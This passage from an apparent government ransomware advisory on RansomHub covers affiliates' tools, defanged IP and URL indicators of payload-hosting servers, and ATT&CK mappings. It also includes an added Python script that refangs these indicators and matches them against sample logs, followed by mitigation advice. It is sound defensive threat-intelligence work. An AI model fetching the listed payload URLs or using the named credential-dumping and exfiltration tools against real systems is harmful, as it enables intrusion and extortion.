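The shadow-copy rule will also fire on legitimate backup administration, so in practice it is scoped by the account and host involved and correlated with the other two rules rather than alerted on alone.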

Leveraged Tools

See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Used by RansomHub Affiliates
Tool Name Description
BITSAdmin A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.
Cobalt Strike [S0154] A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution.
Mimikatz [S0002] A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation.
PSExec [S0029] A tool designed to run programs and execute commands on remote systems.
PowerShell Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
RClone A command line program used to sync files with cloud storage services.
Sliver A penetration testing toolset which allows for remote command and control of systems.
SMBExec A tool designed to manipulate SMB services for remote code execution.
WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts.
CrackMapExec Pentest Toolset
Kerberoast Kerberos Brute force and Exploitation Tool
AngryIPScanner Network Scanner

Indicators of Compromise

Disclaimer: Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking).

See Table 2–Table 5 for IOCs obtained from FBI investigations.

Table 2: Directory Structure TTPs
Filename Description
C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe CrackMapExec
C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe Kerberoasting
C:\Users\%USERNAME%\Downloads\Anydesk.exe Anydesk C2
C:\Users\%USERNAME%\Desktop\IamBatMan.exe Ransomware
C:\Users\backupexec\Desktop\stealer_cli_v2.exe Info Stealer
C:\Users\%USERNAME%\Downloads\nmap-7.94-setup.exe Nmap
C:\Program Files (x86)\Nmap\nmap.exe Nmap
C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe Mimikatz
C:\Users\backupexec\Downloads\x64\mimikatz.exe Mimikatz

Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.

Table 3: Known IPs Related to Malicious Activity (2023-2024)
IP Address
8.211.2[.]97
45.95.67[.]41
45.134.140[.]69
45.135.232[.]2
89.23.96[.]203
188.34.188[.]7
193.106.175[.]107
193.124.125[.]78
193.233.254[.]21
Table 4: Known URLs Related to Malicious Activity (2023-2024)
Web Requests
http[:]//188.34.188[.]7/555
http[:]//188.34.188[.]7/555/
http[:]//188.34.188[.]7/555/amba16.ico
http[:]//188.34.188[.]7/555/bcrypt.dll
http[:]//188.34.188[.]7/555/CRYPTSP.dll
http[:]//188.34.188[.]7/555/en
http[:]//188.34.188[.]7/555/en-US
http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe
http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe.Config
http[:]//188.34.188[].7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI
http[:]//89.23.96[.]203/
http[:]//89.23.96[.]203/333
http[:]//89.23.96[.]203/333/
http[:]//89.23.96[.]203/333/1.exe
http[:]//89.23.96[.]203/333/1.exe.Config
http[:]//89.23.96[.]203/333/10.exe
http[:]//89.23.96[.]203/333/12.exe
http[:]//89.23.96[.]203/333/12.exe.Config
http[:]//89.23.96[.]203/333/2.exe
http[:]//89.23.96[.]203/333/2.exe.Config
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe.Config
http[:]//89.23.96[.]203/333/3.exe
http[:]//89.23.96[.]203/333/3.exe.Config
http[:]//89.23.96[.]203/333/4.exe
http[:]//89.23.96[.]203/333/4.exe.Config
http[:]//89.23.96[.]203/333/5.exe
http[:]//89.23.96[.]203/333/5.exe.Config
http[:]//89.23.96[.]203/333/6.exe
http[:]//89.23.96[.]203/333/7.exe
http[:]//89.23.96[.]203/333/8.exe
http[:]//89.23.96[.]203/333/9.exe
http[:]//89.23.96[.]203/333/92.exe
http[:]//89.23.96[.]203/333/AmbaPDF.ico
http[:]//89.23.96[.]203/333/ambapdf.ico.DLL
http[:]//89.23.96[.]203/333/bcrypt.dll
http[:]//89.23.96[.]203/333/Cabinet.dll
http[:]//89.23.96[.]203/333/CRYPTBASE.DLL
http[:]//89.23.96[.]203/333/cryptnet.dll
http[:]//89.23.96[.]203/333/CRYPTSP.dll
http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe
http[:]//89.23.96[.]203/333/DPAPI.DLL
http[:]//89.23.96[.]203/333/en
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.dll
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.exe
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll
http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe
http[:]//89.23.96[.]203/333/en-US
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.dll
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.exe
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll
http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe
http[:]//89.23.96[.]203/333/iertutil.dll
http[:]//89.23.96[.]203/333/information.exe
http[:]//89.23.96[.]203/333/information.exe.Config
http[:]//89.23.96[.]203/333/information.INI
http[:]//89.23.96[.]203/333/IPHLPAPI.DLL
http[:]//89.23.96[.]203/333/mshtml.dll
http[:]//89.23.96[.]203/333/msi.dll
http[:]//89.23.96[.]203/333/SspiCli.dll
http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe
http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe.Config
http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe
http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe
http[:]//89.23.96[.]203/333/urlmon.dll
http[:]//89.23.96[.]203/333/USERENV.dll
http[:]//89.23.96[.]203/333/webio.dll
http[:]//89.23.96[.]203/333/winhttp.dll
http[:]//89.23.96[.]203/333/WININET.dll
http[:]//89.23.96[.]203/333/WINMM.dll
http[:]//89.23.96[.]203/333/WINMMBASE.dll
http[:]//89.23.96[.]203/333/winnlsres.dll
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe
http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe.Config
http[:]//temp.sh/KnCqD/superloop.exe
https[:]//grabify.link/Y33YXP
https[:]//i.ibb.co/2KBydfw/112882618.png
https[:]//i.ibb.co/4g6jH2J/2773036704.png
https[:]//i.ibb.co/b1bZBpg/2615174623.png
https[:]//i.ibb.co/Fxhyq6t/2077411869.png
https[:]//i.ibb.co/HK0jV1G/534475006.png
https[:]//i.ibb.co/nbMNnW4/2501108160.png
https[:]//i.ibb.co/p1RCtpy/2681232755.png
https[:]//i.ibb.co/SxQLwYm/1038436121.png
https[:]//i.ibb.co/v1bn9ZK/369210627.png
https[:]//i.ibb.co/V3Kj1c2/1154761258.png
https[:]//i.ibb.co/X2FR8Kz/2113791011.png
https[:]//i.ibb.com:443/V3Kj1c2/1154761258.png
https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.css
https[:]//12301230[.]co/npm/module.external/jquery.min.js
https[:]//12301230[.]co/npm/module.external/moment.min.js
https[:]//12301230[.]co/npm/module.external/client.min.js
https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.js
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js
https[:]//samuelelena[.]co/npm/module.external/moment.min.js
https[:]//samuelelena[.]co/npm/module.external/client.min.js
https[:]//samuelelena[.]co/
http[:]//samuelelena[.]co/
https[:]//samuelelena[.]co/npm
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js
http[:]//samuelelena[.]co/npm/
http[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js
http[:]//samuelelena[.]co/npm/module.external/client.min.js
https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js
https[:]//samuelelena[.]co/npm/module.external
https[:]//samuelelena[.]co/np
https[:]/samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js
https[:]//samuelelena[.]co/npm/module[.]tripadvisor/module[.]tripadvisor[.]js
https[:]//samuelelena[.]co/npm/module[.]external/client.min.js
https[:]//samuelelena[.]co/npm/module.external/jquery.min.js 
http[:]//samuelelena[.]co:443/
http[:]//samuelelena[.]co/npm/module.external/jquery.min.js
https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.css
https[:]//40031[.]co/npm/module.external/jquery.min.js
https[:]//40031[.]co/npm/module.external/moment.min.js
https[:]//40031[.]co/npm/module.external/client.min.js
https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.js
Table 5: Emails Related to RansomHub (2023-2024)
Email Addresses
brahma2023[@]onionmail.org
[@]protonmail.com
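The indicators in Table 3 through Table 5 are defanged with bracket notation and, as the disclaimers above note, are meant to be vetted rather than blocked automatically. The block below is an added example, not tooling from the advisory or the authoring organizations: it refangs a subset of the indicators copied from the tables, sorts them into IP, host, URL and email sets, sets aside entries it cannot parse (for instance the Table 4 entry defanged as `188.34.188[].7`) for manual review, and matches the sets against proxy log lines constructed for the example.

```python
"""Refang, classify and match the defanged indicators from Tables 3-5 (added example)."""
import ipaddress
import re
from typing import List, Tuple

# Subset of indicators copied from the tables above, still in defanged form.
DEFANGED_IOCS: List[str] = [
    "8.211.2[.]97",
    "89.23.96[.]203",
    "188.34.188[.]7",
    "http[:]//188.34.188[.]7/555/bcrypt.dll",
    "http[:]//188.34.188[].7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI",  # irregular defanging in Table 4
    "http[:]//89.23.96[.]203/333/1.exe",
    "https[:]//samuelelena[.]co/npm/module[.]external/client.min.js",
    "brahma2023[@]onionmail.org",
]

URL_RE = re.compile(r"^(https?)://([^/?#]+)(.*)$", re.I)
HOST_RE = re.compile(r"^[a-z0-9][a-z0-9.-]*$", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
LOG_RE = re.compile(r"dst=(?P<dst>\S+)\s+url=(?P<url>\S+)")


def refang(ioc: str) -> str:
    """Undo the bracket defanging the tables use: [.] [:] [@]."""
    return ioc.strip().replace("[.]", ".").replace("[:]", ":").replace("[@]", "@")


def is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def split_url(url: str):
    """Return (scheme, host, rest) with scheme and host lower-cased and any :port dropped, else None."""
    m = URL_RE.match(url)
    if not m:
        return None
    scheme, netloc, rest = m.groups()
    return scheme.lower(), netloc.rsplit(":", 1)[0].lower(), rest


def build_indicator_sets(defanged: List[str]) -> dict:
    """Sort indicators into typed sets; anything unparseable is kept aside for review."""
    sets = {"ips": set(), "hosts": set(), "urls": set(), "emails": set(), "unparsed": []}
    for raw in defanged:
        value = refang(raw)
        if is_ip(value):
            sets["ips"].add(value)
            continue
        parts = split_url(value)
        if parts:
            scheme, host, rest = parts
            if is_ip(host) or HOST_RE.match(host):
                sets["hosts"].add(host)
                sets["urls"].add(f"{scheme}://{host}{rest}")
            else:
                sets["unparsed"].append(raw)   # malformed host: do not guess, review by hand
            continue
        if EMAIL_RE.match(value):
            sets["emails"].add(value.lower())
            continue
        sets["unparsed"].append(raw)
    return sets


# Constructed proxy log lines; only the dst= and url= fields are read.
LOG_LINES: List[str] = [
    "2024-05-02T09:14:03Z src=10.10.4.21 dst=89.23.96.203 url=http://89.23.96.203/333/1.exe",
    "2024-05-02T09:14:05Z src=10.10.4.21 dst=203.0.113.10 url=http://203.0.113.10/index.html",
    "2024-05-02T09:15:10Z src=10.10.7.8 dst=188.34.188.7 url=http://188.34.188.7/555/favicon.ico",
    "2024-05-02T09:16:42Z src=10.10.7.8 dst=203.0.113.44 url=https://SamuelElena.co/npm/module.external/moment.min.js",
]


def match_logs(lines: List[str], sets: dict) -> List[Tuple[int, str, str]]:
    """Report (line number, match kind, matched value); the most specific kind wins."""
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = split_url(m["url"])
        url = f"{parts[0]}://{parts[1]}{parts[2]}" if parts else ""
        host = parts[1] if parts else ""
        if url in sets["urls"]:
            hits.append((n, "url", url))
        elif m["dst"] in sets["ips"]:
            hits.append((n, "ip", m["dst"]))
        elif host in sets["hosts"]:
            hits.append((n, "host", host))
    return hits


if __name__ == "__main__":
    indicator_sets = build_indicator_sets(DEFANGED_IOCS)
    print("needs review:", indicator_sets["unparsed"])
    for hit in match_logs(LOG_LINES, indicator_sets):
        print(hit)
```

A hit at the "host" or "ip" level is weaker than an exact URL match, since the tables note that several addresses have been reused over years and may host valid domains; the match kind is returned so that an analyst can weight it accordingly before acting.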

MITRE ATT&CK Tactics and Techniques

See Table 6–Table 17 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 6: Resource Development
Technique Title ID Use
Obtain Capabilities: Exploits T1588.005 RansomHub affiliates may buy, steal, or download exploits that can be used during targeting.
Table 7: Initial Access
Technique Title ID Use
Phishing T1566 RansomHub affiliates used mass phishing and spear-phishing emails to obtain initial access.
Exploit Public-Facing Application T1190 RansomHub affiliates may exploit known vulnerabilities to obtain initial access.
Table 8: Execution
Technique Title ID Use
Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.
Windows Management Instrumentation T1047 RansomHub affiliates may abuse Windows Management Instrumentation to execute malicious commands and payloads.
Table 9: Persistence
Technique Title ID Use
Command and Scripting Interpreter T1059.001 RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.
Create Account T1136 RansomHub affiliates may create an account to maintain access to victim systems.
Table 10: Privilege Escalation
Technique Title ID Use
Account Manipulation T1098 RansomHub affiliates may manipulate accounts to maintain and/or elevate access to victim systems.
Remote Services: Remote Desktop Protocol T1021.001 RansomHub affiliates may log onto systems using the Remote Desktop Protocol, then perform actions as the logged-on user.
Table 11: Defense Evasion
Technique Title ID Use
Masquerading T1036 RansomHub affiliates may hide binaries by renaming executable names.
Indicator Removal on Host T1070 RansomHub affiliates may remove logs to inhibit cybersecurity response.
Impair Defenses: Disable or Modify Tools T1562.001 RansomHub affiliates may disable endpoint detection and response (EDR) tooling to avoid detection.
Table 12: Credential Access
Technique Title ID Use
OS Credential Dumping T1003 RansomHub affiliates used Mimikatz on Windows systems to gather credentials.
Brute Force: Password Spraying T1110.003 RansomHub affiliates may use password spraying to obtain initial access.
Table 13: Discovery
Technique Title ID Use
Remote System Discovery T1018 RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.
Network Service Discovery T1046 RansomHub affiliates may attempt to get a listing of services running on remote hosts and local network infrastructure devices.
Table 14: Lateral Movement
Technique Title ID Use
Exploitation of Remote Services T1210 RansomHub affiliates may exploit remote services to gain unauthorized access to internal systems once inside of a network.
Table 15: Command and Control
Technique Title ID Use
Remote Access Software T1219 RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software, to establish an interactive command and control channel to target systems within networks.
Table 16: Exfiltration
Technique Title ID Use
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.
Transfer Data to Cloud Account T1537 RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol T1048.003 RansomHub affiliates may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.
Table 17: Impact
Technique Title ID Use
Data Encrypted for Impact T1486 RansomHub affiliates used encryption for ransomware operations.
Inhibit System Recovery T1490 RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations.

Incident Response

If compromise is detected, organizations should:

  1. Quarantine or take potentially affected hosts offline.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  5. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to the Multi-State Information Sharing and Analysis Center (MS-ISAC) (SOC@cisecurity.org or 866-787-4722).

Mitigations

Network Defenders

The authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;
    • Store passwords in hashed format using industry-recognized password managers;
    • Add password user “salts” to shared login credentials;
    • Avoid reusing passwords;
    • Implement multiple failed login attempt account lockouts;
    • Disable password “hints”; and
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Keep all operating systems, software, and firmware up to date [CPG 1.E]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
  • Require Phishing-Resistant multifactor authentication to administrator accounts [CPG 2.H] and require standard MFA for all services to the extent possible (particularly for webmail, virtual private networks, and accounts that access critical systems).
  • Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Implement Secure Logging Collection and Storage Practices [CPG 2.T]. Learn more about logging best practices by referencing CISA’s Logging Made Easy resources.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
  • Disable unused ports.
  • Implement and enforce email security policies [CPG 2.M].
  • Disable macros by default [CPG 2.N].
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
  • Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.

Software Manufacturers

The above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team):

  • Embed security into product architecture throughout the entire software development lifecycle (SDLC).
  • Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.

These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.

For more information on secure by design, see CISA’s Secure by Design webpage.

Validate Security Controls

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 6–Table 17).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

References

  1. Ransomware Roundup – Knight | FortiGuard Labs (fortinet.com)
  2. Knight Ransomware – X-Industry – Red Sky Alliance
  3. Cyclops Ransomware and Stealer Combo: Exploring a Dual Threat (uptycs.com)
  4. Knight ransomware distributed in fake Tripadvisor complaint emails (bleepingcomputer.com)

Reporting

Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.